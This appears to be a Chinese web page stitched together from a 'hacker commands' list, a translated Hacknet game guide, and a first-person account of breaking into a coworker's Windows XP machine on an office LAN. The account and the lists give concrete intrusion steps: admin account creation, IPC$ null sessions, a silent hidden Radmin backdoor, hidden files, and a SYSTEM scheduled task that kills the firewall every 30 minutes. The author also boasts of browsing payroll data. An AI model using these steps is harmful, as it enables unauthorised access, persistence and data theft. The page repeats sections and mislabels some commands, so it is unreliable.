黑客常用命令大全_黑客网络运行命令大全

hacker|
85

黑客常用的网络命令有哪些呀 分别是什么呀 怎么用的呀

net user heibai lovechina /add 加一个heibai的用户密码为lovechina

net localgroup Administrators heibai /add 把他加入Administrator组

net start telnet 开对方的TELNET服务

net use z:\127.0.0.1c$ 映射对方的C盘

net user guest /active:yes 将Guest用户激活

net user guest lovechina 把guest的密码改为lovechina

net user 查看所有用户列表

net user 用户名 /delete 删掉

net time \\127.0.0.1 得到对方的时间,

get c:\index.htm d:\ 上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\

copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘

NET VIEW 显示域列表、计算机列表或指定计算机的共

计算机运行命令全集 winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

wscript--------windows脚本宿主设置

write----------写字板winmsd-----系统信息

wiaacmgr-------扫描仪和照相机向导

winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况

Msconfig.exe---系统配置实用程序

mplayer2-------简易widnows media player

mspaint--------画图板

mstsc----------远程桌面连接

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \\ip\c$ 登陆后映射对方C:到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

mplayer2-------媒体播放机

magnify--------放大镜实用程序

mmc------------打开控制台

mobsync--------同步命令

dxdiag---------检查DirectX信息

drwtsn32------ 系统医生

devmgmt.msc--- 设备管理器

dfrg.msc-------磁盘碎片整理程序

diskmgmt.msc---磁盘管理实用程序

dcomcnfg-------打开系统组件服务

ddeshare-------打开DDE共享设置

dvdplay--------DVD播放器

net stop messenger-----停止信使服务

net start messenger----开始信使服务

notepad--------打开记事本

nslookup-------网络管理的工具向导

ntbackup-------系统备份和还原

narrator-------屏幕"讲述人"

ntmsmgr.msc----移动存储管理器

ntmsoprq.msc---移动存储管理员操作请求

netstat -an----(TC)命令检查接口

syncapp--------创建一个公文包

sysedit--------系统配置编辑器

sigverif-------文件签名验证程序

sndrec32-------录音机

shrpubw--------创建共享文件夹

secpol.msc-----本地安全策略

syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码

services.msc---本地服务设置

Sndvol32-------音量控制程序

sfc.exe--------系统文件检查器

sfc /scannow---windows文件保护

Nslookup-------60秒倒计时关机命令

tourstart------xp简介(安装完成后出现的漫游xp程序)

taskmgr--------任务管理器

eventvwr-------事件查看器

eudcedit-------造字程序

explorer-------打开资源管理器

packager-------对象包装程序

perfmon.msc----计算机性能监测程序

progman--------程序管理器

regedit.exe----注册表

rsop.msc-------组策略结果集

regedt32-------注册表编辑器

rononce -p ----15秒关机

regsvr32 /u *.dll----停止dll文件运行

regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符

chkdsk.exe-----Chkdsk磁盘检查

certmgr.msc----证书管理实用程序

calc-----------启动计算器

charmap--------启动字符映射表

cliconfg-------SQL SERVER 客户端网络实用程序

Clipbrd--------剪贴板查看器

conf-----------启动netmeeting

compmgmt.msc---计算机管理

cleanmgr-------**整理

ciadv.msc------索引服务程序

osk------------打开屏幕键盘

odbcad32-------ODBC数据源管理器

oobe/msoobe /a----检查XP是否激活

lusrmgr.msc----本机用户和组

logoff---------注销命令

iexpress-------木马捆绑工具,系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略

黑客网络新手指南翻译大全 黑客网络Hacknet新手怎么玩

黑客网络Hacknet你会玩了吗?小伙伴们是不是正在为看不懂英文而烦恼呢,不要烦恼,今日小编为大家带来最全的新手指南,全中文翻译哦,感兴趣的玩家赶紧来看看吧!

Basic Tips 基础窍门

***IMPORTANT*** Some computers/servers may have different names on them, but what you need to do should be the same. Just follow the steps, you will be fine.

***非常重要*** 有些电脑/服务器可能有不同的名字,但你所要做的应该相同。遵循如下步骤,您就不会有问题。

DON'T abandon any missions atm!! It will most likey cause serious problems and make you unable to finish the game!

眼下,***请勿***放弃任何任务!!这很可能导致严重问题并最终无法完成游戏,毁掉您的存档!

1, Type commands as soon as possible.

2, Delete logs when you disconnect.

3, You need to reply almost every time you finish a mission.

4, Always use "Scan Network" option when you successfully hack a computer.

5, Don't delete/rename files unnecessarily. -This is important!!

6, Use auto-complete for commands and file names. (Tab key)

7, Always use "admin" "alpine" to log in to any eos devices.

1.尽速输入指令。(译者:更要善用Tab)

2.断线前别忘了删log。(译者:虽然我不删也没有什么麻烦……)

3.不要忘了完成任务时回复邮件。(极少数情况不需要)

4.成功骇入电脑时总扫描一遍主机。(译者:★★★★★推荐)

5.无必要时不要删除/重命名任何文件!—十分重要。

6.使用“自动拼写”(Tab键)输入指令及文件名。

7.不要忘了“admin”“alpine”这神奇的eos设备账户。

译者:即使你希望独立完成游戏,我也非常推荐您阅读这些提示,它们非常有用。另外我在此补充几条。

(但愿我没记错……)

1.SQL的入侵工具和KBT,即104端口入侵工具可以忽视Proxy和Firewall。

2.Firewall和Proxy的破解是独立的,你可以一边破解proxy一边analysis。更有甚者,用Tracekill可以允许您慢悠悠地破解完Firewall,再攻破proxy。

3.在shell里按overload破解proxy,对吧?然而如果内存不足,这些窗口会折叠,并在内存足够时展开。(如果我说的不清楚,可以试着在您的电脑上运行一堆shell并点按trap,然后关掉其中一个窗口。)除了略有点壮观以外,这是个“储存”足够多shell的小技巧。

4.不过,5~7个shell一般够了。

5.在几次analyze后弹出的几行文字里应该会各有一个字符,如果某一行里全是”0”怎么办?有时这意味着所对应的代码就是0。例如:(只是示范)

0 0 0 0 0 0 0 0 0 0 2 0 0 0

0 0 0 0 0 5 0 0 0 0 0 0 0 0

0 0 0 0 0 0 0 0 0 0 0 0 0 0

结果就是250。(我才不是250呢!)

Troubleshooting Common Problems

Q, I don't get an email to start a new mission!! What do I do now!?

A, Make sure to check following things:

1, Your previous mission has finished. (Click "Reply" in the email for it and see if "Mission Incomplete" message shows up.)

2, You don't have any available missions in your current faction's contracts server. (Or the message board if you're working on /el missions.)

3, Restart your game and your problem is still there.

常见问题解决方案。(疑难杂症)

Q:我得不到开始新任务的邮件!!我该怎么办!

A:出门检查您的邮筒(划掉)。请确认您已检查过以下条件。

1.你上一个的任务已完成。[尝试点按邮件中的“Reply”(回复)看会不会出现“Mission incomplete”(任务未完成)。]

2.在您现在所处的派系(Entropy,CSEC,…)没有可用的任务,或者

在/el任务里信息板上没有任务。

3.重启游戏问题仍存在。

For "gg wp" from Naix, you need to revenge Naix BEFORE you start any new Entropy mission. Details in "Naix Missions" section below.

对于Naix的“友善问好”,你要在完成Entropy任务***之前***对Naix报仇。下面的“Naix任务”一栏会给您帮助。

If none of these helps you, you might have had a critical bug... The devs are working on an update to fix many bugs, so wait for it... Meanwhile, you still can try 2 options:

1, Editing your save data (Here's the link: http:// Be super careful with your savedata.)

2, Start a new session (This is much easier... You also can work on achievements that you missed.)

若以上几条都不起作用,您已无药可救了(划掉)。您可能遇到了一个严重的bug(您不会连bug也不知道吧?)。开发者们(们?)在致力于更新游戏以修正bug。所以只能等了。

在此时,您可以尝试以下方法。

1.编辑您的存档。(敬参阅{链接已删除}请特别小心对待您的存档)

2.再开个存档。(不仅简单多了,还可以去做您以前忽略的成就。)

Q, I don't have the necessary exe file to do this mission!! UGGHHHH

A, Here is the list of exe files, and in which mission you can find them. Use "CTRL+F" on this guide and search for them.

Q.我怎么没有做任务所需的工具!!啊啊啊!!

A.这是exe文件列表及其来源,用"CTRL+F"在这指南里搜索一下。

SecurityTracer.exe - "First Contact", or on "Credit Server" after you finish the game.

SSHcrack.exe (for port 22) - "Getting Some tools together"

FTPBounce.exe (for port 21) - "Welcome"

eosDeviceScan.exe (for finding eos device) - "eOS Device Scanning"

SMTPoverflow.exe (for port 25) - "Aggression must be punished"

WebServerWorm.exe (for port 80) - "***Revenging Naix***", or "CSEC Invitation"

SQLBufferOverflow.exe (for port 1433) - "-Shrine of Polar Star-"

SQL_MemCorrupt.exe (for port 1433) - "CSEC Invitation - Congratulations"

Decypher.exe (for decrypting files) - "Ghosting the Vault"

DECHead.exe (for analyzing .dec files) - "Through the Spyglass"

KBT_PortTest.exe (for port 104) - "Project Junebug"

TraceKill.exe (for freezing traces) - "Bit -- Foundation"

Sequencer.exe (for the final hacking) - "Bit -- Termination"

Clock.exe (Um...just a clock app) - Read "-Finding Clock.exe-"

SecurityTracer.exe(安全追踪程序) -来自 "First Contact"(第一次沟通), 或在完成游戏时的"Credit Server" (荣誉服务器)上。

SSHcrack.exe (ssh协议破解器)(适用端口 22) - "Getting Some tools together"(收集些工具)

FTPBounce.exe (ftp“跳转攻击”破解器)(适用端口21) - "Welcome"(欢迎)

eosDeviceScan.exe(eos设备搜寻器) (适用寻找eos设备) - "eOS Device Scanning"(搜寻eos设备)

SMTPoverflow.exe(邮件过载破解器) (适用端口25) - "Aggression must be punished"(侵略者必将受惩处)

WebServerWorm.exe (网络蠕虫破解器)(适用端口80) - "***Revenging Naix***"(向Naix复仇 译者:这不是一个官方给出的任务名,我没记错的话。), or "CSEC Invitation"(CSEC诚邀您到来)

SQLBufferOverflow.exe (SQL内存缓冲区过载破解器)(适用端口1433) - "-Shrine of Polar Star-"(北极星圣地)

SQL_MemCorrupt.exe(SQL_内存错误破解器) (for port 1433) - "CSEC Invitation - Congratulations"(CSEC邀请-祝贺!)

(译者:根据另一个指南,这两个SQL破解器完全一样。)

Decypher.exe (解密器)(适用解密文件) - "Ghosting the Vault"[拱顶鬼神(?)]

DECHead.exe (十六进制文件头查看器/加密文件查看器?)(适用分析加密文件) - "Through the Spyglass"(通过望远镜)

KBT_PortTest.exe[KBT端口测试器(其实也是破解器。)] (适用端口104) - "Project Junebug"(Junebug项目)

TraceKill.exe(阻止追踪) (适用冻结追踪) - "Bit -- Foundation"(Bit-支柱)

Sequencer.exe(排序器) (适用最后骇入) - "Bit -- Termination"(Bit-终局)

Clock.exe (钟)(Hmm…只是个钟的软件) - Read "-Finding Clock.exe-"(敬参阅“寻找‘Clock.exe’”)

For KBT_PortTest.exe, you can try this method if you don't get "Project Junebug" unlocked, or mistakenly abandoned it. Thank you, Elsarild!

对于KBT_PortTest.exe,若您没有解锁“Junebug项目”,或失误取消了这个任务,可以试试这个方法。谢谢您,Elsarild!

http://

Q, I can't use this command somehow!! Fuuuuuuuuuuuuuuu

A, Make sure to check if you already have the necessary exe for the command, then try typing commands like below:

Q,由于某种原因我没法用这命令!(根据相关法律法规和政策,该信息不予公布)

A,确认您已具备所需的软件,然后根据以下范例输入命令。

译者:Hacknet的命令似乎更接近Linux。

Command Template - Example

命令 样板 - 范例

scp [the file's name] - scp index.html

connect [the IP address] - connect 103.33.8.643

cd [the folder path] - cd /log

replace [the file's name] "[target words]" "[your words]" - replace template.txt "[FIRST_NAME]" "John"

(If you use "cat" and open the file, you can use 'replace "[FIRST_NAME]" "John" ' instead. Use the full command above if you get "Assuming active flag file" error.)

Decypher [the file's name] [its password] - Decypher naix_secrets.dec D1CKS

DECHead [the file's name] - DECHead naix_private_photos.dec

mv [target's name] [new name] - mv template.txt Boorman_John[111]

scp (文件传输)[the file's name(文件名)] - scp index.html

connect(连接) [the IP address(IP地址)] - connect 103.33.8.643

cd (改变目录)[the folder path(文件地址)] - cd /log

replace(替换) [the file's name(文件名)] "[target words(文件中目标文字)]" "[your words(你想要替代它的文字)]" - replace template.txt "[FIRST_NAME]" "John"

[若您使用cat打开文件,你可以使用以下命令:“replace "[FIRST_NAME]" "John"”,若得到"Assuming active flag file"(译者:我对这句实在没辙……抱歉……)错误则打全整条命令。]

Decypher [the file's name(文件名)] [its password(其密码,有时没有)] - Decypher naix_secrets.dec D1CKS

mv(移动) [target's name(目标文件名)] [new name(新名)] - mv template.txt Boorman_John[111]

;wfr=spiderfor=pc

入侵网站的命令大全?

黑客常用命令大全

net user heibai lovechina /add 加一个heibai的用户密码为lovechina

net localgroup Administrators heibai /add 把他加入Administrator组

net start telnet 开对方的TELNET服务

net use z:\127.0.0.1c$ 映射对方的C盘

net user guest /active:yes 将Guest用户激活

net user guest lovechina 把guest的密码改为lovechina

net user 查看所有用户列表

net user 用户名 /delete 删掉

net time \\127.0.0.1 得到对方的时间, get c:\index.htm d:\ 上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘

NET VIEW 显示域列表、计算机列表或指定计算机的共

计算机运行命令全集 winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

wscript--------windows脚本宿主设置

write----------写字板winmsd-----系统信息

wiaacmgr-------扫描仪和照相机向导

winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况

Msconfig.exe---系统配置实用程序

mplayer2-------简易widnows media player

mspaint--------画图板

mstsc----------远程桌面连接

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \\ip\c$ 登陆后映射对方C:到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名  开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

局域网入侵命令有哪些?

先打开命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time1msTTL=128,说明对方没有防火墙,这样或许有可能入侵。

下一步,我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。

第二种方法就是如果对方有比较严重的漏洞,如RPC溢出

先打开命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time1msTTL=128,说明对方没有防火墙,这样或许有可能入侵。下一步,我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。第二种方法就是如果对方有比较严重的漏洞,如RPC溢出。这样的话,用溢出程序溢出它,然后再上传控制程序进行控制。扫描结果确实让我高兴了一阵,对方电脑有大量的漏洞,其中一个比较有名的就是冲击波利用的RPC漏洞,这个漏洞相当出名了,03年的时候曾席卷全球。知道了它有这个漏洞,下一步就要找溢出程序,这让我忙活了好一阵时间,因为有的溢出程序对这台电脑好像无效。这些工具的名称我都记不起来了,反正有好几个。最后找到了一个溢出程序XP.EXE,这个程序终于溢出了那台电脑。得到了个CMDSHELL。这算是一个小小的胜利吧。

得到了CMDSHELL,我该怎样给它上传控制程序呢?我想了一会儿,终于灵感来了,我和它在一个局域网,用共享上传最方便了。于是打开网上邻居,查看工作组计算机,找到这台电脑,双击,进不去,提示信息我记不清了,据我分析可能是对方这台电脑没有运行网络安装向导,因为是XP系统,所以要用共享传输文件,必须要运行这个向导不可,运行这个向导作用就是配置一个本地安全策略,你可以打开“控制面板—管理工具—本地安全策略”,展开“本地策略”—“用户权利指派”。在右边有一个安全策略—“拒绝从网络访问这台计算机”。我想对方的电脑中相应的这条策略里,肯定设置有GUEST这个用户的,这就是为什么我打不开它的共享的原因,因为共享访问默认是以这个GEUST用户登录的,因为它的安全设置不允许GUEST从网络访问,所以我才访问不了它的共享。因为XP默认的共享模式是简单文件共享。这与WIN2000系统不同,如果是WIN2000系统,你在知道管理员密码的情况下,可以用命令netuseIPipc$"密码"/user:用户名建立与对方的ipc$连接,随之而来的就是copy木马程序ipd$这样的命令上传木马了。XP就不能这样子了,你即使知道它的管理员密码用上面的命令与不能建立ipc$连接。这就是为什么XP比2000系统安全的地方所在。下面我要作的就是要修改XP的共享模式为2000的共享模式。方法如下:在溢出获得的CMDSHELL下,键入命令:

echoWindowsRegistryEditorVersion5.00c:123.reg

echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]c:123.reg

echo.c:123.reg

echo"forceguest"=dword:00000000c:123.reg

regedit/ec:123.reg

等打完这几条命令后,对方XP的共享模式就已经与2000的相同了。我来解释一下这几条命令的含意,echoWindowsRegistryEditorVersion5.00c:123.reg这条命令是将WindowsRegistryEditorVersion5.00这几个字符保存到c:123.reg文件里。大家需要注意一下第一句的和后面几句的这是有区别的,字符是覆盖式的,是追加式的,第三句的echo.c:123.reg命令是追加一个空白行,这句挺重要,如果不加这句是不能成功的,你可以随便打开一个注册表文件看一下,格式就是这样的,第二行是空着的。这一点一定要注意。执行完前四条命令后就在对方C盘下生成一个123.reg文件,内容如下:

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

第五条命令是将这个REG文件导入到注册表中。这样执行完这五条命令后,我就可以像操作2000系统一样去用ipc$控制了。下一步,上传控制程序。我选择的是RADMIN2.0的服务程序,有人问这个安装需要到图形界面下,我说不用这么费事,在CMDSHELL下一样可以安装。安装前我们需要先准备一下,首先生成一个REG文件,文件名:aaa.reg内容如下:

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]

"DisableTrayIcon"=hex:01,00,00,00

作用就是使生成的服务端程序能够隐藏通知栏里的图标,我们都知道正常安装RADMIN服务端程序后,在通知栏里是有一个小图标的,我们要入侵人家,当然要把这个小图标去掉,不然是会被发现的。接着生成一个BAT文件,我命名为aaa.bat,内容如下:

r_server/install/silence

r_server.exe/port:2233/pass:1/save/silence

regedit.exe/saaa.reg

netstartr_server

这些命令是安装命令,设置连接端口为:2233密码是:1隐藏安装界面的方式安装然后就是将aaa.reg导入注册表,启动r_server服务。

准备工作作好后,就要上传文件了,一共需上传4个文件,aaa.regaaa.batr_server.exeadmdll.dll后两个文件是RADMIN安装目录下的,在安装了RADMIN2.0客户端后,安装目录里就有这两个文件。我先建立ipc$连接netuse192.168.16.4ipc$""/user:administrator提示:命令成功完成。接着:

copyr_server192.168.1.4admin$system32

copyaaa.bat192.168.1.4admin$system32

copyaaa.reg192.168.1.4admin$system32

copyadmdll.dll192.168.1.4admin$system32

然后再进入溢出得到的CMDSHELL下键入:

attrib+s+h+rc:windowssystem32r_server.exe

attrib+s+h+rc:windowssystem32admdll.exe

attrib+s+h+rc:windowssystem32aaa.bat

attrib+s+h+rc:windowssystem32aaa.reg

这些命令是将这4个文件设置成系统隐藏只读文件,不容易被对方管理员发现。

下一步就是运行aaa.bat了,就这么简单,运行成功后,我用radmin2.0客户端设置了一下连接参数,端口改成2233,连接成功,密码是1,成功地看到了对方的屏幕。呵呵,成功了,从有入侵的想法到入侵成功进行控制,只用了短短的4天时间。

进入后看到对方电脑上正在玩QQ保皇游戏,不过我也犯了个错误我给它新建了个管理用户,原先是打算用于ipc$连接用的,可我上传RADMIN控制后忘记删掉了,我在溢出的CMDSHELL下不小心键入了命令EXIT,结果对方电脑出现了倒计时关机的界面,我也没有及时处理掉,我当时要是用RADMIN的CMD功能,键入命令shutdown-A就可以取消这个倒计时关机的界面,可当时我也没有及时处理,导致对方电脑重启了,重启后我估计对方管理员看到了我新建的用户了,后来我用RADMIN远程查看时,也觉得这个新建用户太招摇了,用户名就是ip$,图标是个大红的花朵。

下午的时候我发现那台电脑的管理员请了位高手来助阵了,因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到互联网上,所以,那位高手先到我们办公室电脑上查看了一番没有发现问题后,他将原先安装的江民换成了卡巴了,我估计他认为攻击是来自互联网上,岂不知黑客就在他眼皮底下,嘿嘿。。。。那位高手又给被我控制了的电脑上安装了卡巴,原先的杀毒软件是诺顿,对WINDOWS也进行了更新,可这些作法都晚了,因为我已经控制你了,再打补丁也无用了。经过那位高手一番检查与修补后,我的后门依然存在着,看来那位高手水平也不怎么样。我给它开放的ipc$功能,他也没发现。也许他只认为是一次简单的病毒攻击,而掉以轻心了,而不知他的一举一动都在我的监视之下。哈哈。。。

接下来的工作对我来说就比较简单了,给它开telnet服务器,开“远程桌面”这个我采用的是图形的方式进行操作的,中午下班后我等这台计算机管理员走后,用RADMIN登录进去进行了一些设置工作。后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件,有一些财务报表,工资表之类的东西,这些对我来看没什么大的吸引力。不过我看到了我们集团老总的工资,每月一万多块钱呢!!好黑啊。。。这么多,我工资只有区区几百块,真是太不公平了,愤愤不平中。。。。

后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了,我想对方的管理员也很感到意外,windows的补丁打上了,还装了强悍的卡巴,还是搞不定黑客!!哈哈,因为卡巴不是杀RADMIN的。后来对方那个管理员启用了局域网“本地连接”中的防火墙功能,这样我无法连接它的电脑了。因为RADMIN是正向连接的,所以在对方开防火墙的情况下是无法使用的。有一次下午下班后我无意地ping了一下这台电脑的IP,居然有返回。说明对方防火墙关闭了,我马上用RADMIN连接,居然成功。我晕。。。原来对方只开了防火墙,并没有发现这个明显的后门。我想开防火墙也是那位电脑高手给搞的,依那个管理员的水平是想不到这个办法的。不过telnet服务器给关闭了,3389远程桌面也给关了,共享模式也被修改回了原先的样子。看来那位高手也是发现了一些漏洞并补上了,但是那个后门,他却没有发现,这就给我创造了第二次入侵的机会。他有政策我有对策,他可以开防火墙,我可以给他关掉,有人问要是再被管理员开启了防火墙,那岂不是没得玩了。哈哈。。。我下面给出一个我自己研究出来的独门密方,保证百病!哈哈。。。。

我的方法是创建一个隐藏的计划任务。让这个计划任务每隔半个小时杀除一遍防火墙,这样即使对方管理员打开防火墙也起不了什么作用。方法如下:先建一个批处理文件abc.bat,放在c:windowssystem32目录下,内容如下:

netstopsharedaccess

当然也可以附加点别的,比如说你想半小时杀除一遍天网防火墙,可以再加上下面的命令:

taskkill/IMrfw.exe/f

如果想使共享模式是高级共享模式,可以再加上下面的命令:

regedit/ec:windowssystem32abc.reg

当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下,内容如下:

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

下面我说一下创建隐藏计划任务的方法:

在对方电脑的CMDSHELL下键入命令:

schtasks/create/tn"常驻"/trc:windowssystem32abc.bat/scminute/mo30/ru"system"

这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务,这个计划任务每隔30分钟运行一次c:windowssystem32abc.bat,功能嘛,就是根据abc.bat里面的命令行决定了,可以说这个新发现是相当厉害的,利用的巧妙,功能可以相当强大。如果只有这样还不能达到隐藏的要求,你打开控制面板—任务计划,仍然可以发现它的存在。好的,下面说说隐藏它的方法。还是进入CMDSHELL中。键入命令attrib+hc:windowstasks常驻.job回车后,你再到控制面板的任务计划中看一下是不是以前的任务消失了。这只是表面消失,实际是它还是存在的。你可以在CMDSHELL下键入命令:schtasks查看。这样不管对方管理员怎样修改设置,每隔半小时就又会补修改回来。它想摆脱我的控制可说是难上加难了。

0条大神的评论

发表评论